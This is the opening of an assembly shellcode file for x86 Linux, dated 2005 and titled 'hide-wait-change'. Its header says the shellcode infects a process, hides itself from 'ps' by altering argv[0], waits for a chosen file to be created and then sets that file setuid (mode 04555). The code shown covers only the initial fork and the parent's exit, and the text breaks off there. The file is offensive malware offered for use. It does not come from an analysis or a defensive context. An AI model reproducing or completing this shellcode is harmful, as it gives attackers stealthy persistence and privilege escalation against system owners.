#=============================================================================================#
# hide-wait-change (final v3) #
# ------------------------------------------------------------------------------------------- #
# Author: xort ([email protected]) #
# Date: 08/18/2005 8:05pm #
# Type: shellcode/(x86-linux).s, (at&t) #
# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 #
# Description: This is a shellcode that will infect a process, play some argv[0] games among #
# other tricks to hide itself from 'ps', and wait until the creation of a #
# specified file. Once this file is found to exist, its permissions are changed #
# to 04555 (setuid bit set, r-xr-xr-x). Original concept conceived by izik ([email protected]). #
###############################################################################################
# Everything that follows is assembled into the .text section.
.section .text
# Make _start visible to the linker; GNU ld uses _start as its default entry symbol.
.global _start
###################################################################################
## ##
## _start: 1) fork() a new process ##
## 2) check whether we are the parent or the child ##
## 3) the parent _exit()s; the child (fork() returned 0) jumps to proc_name ##
## ##
###################################################################################
_start:
#-------------------------------------------#
# we start with a fork() #
#-------------------------------------------#
push $0x02
pop %eax
int $0x80
#-------------------------------------------#
# child or parent? #
#-------------------------------------------#
test %eax, %eax
je proc_name
#-------------------------------------------#
# parent goes exit()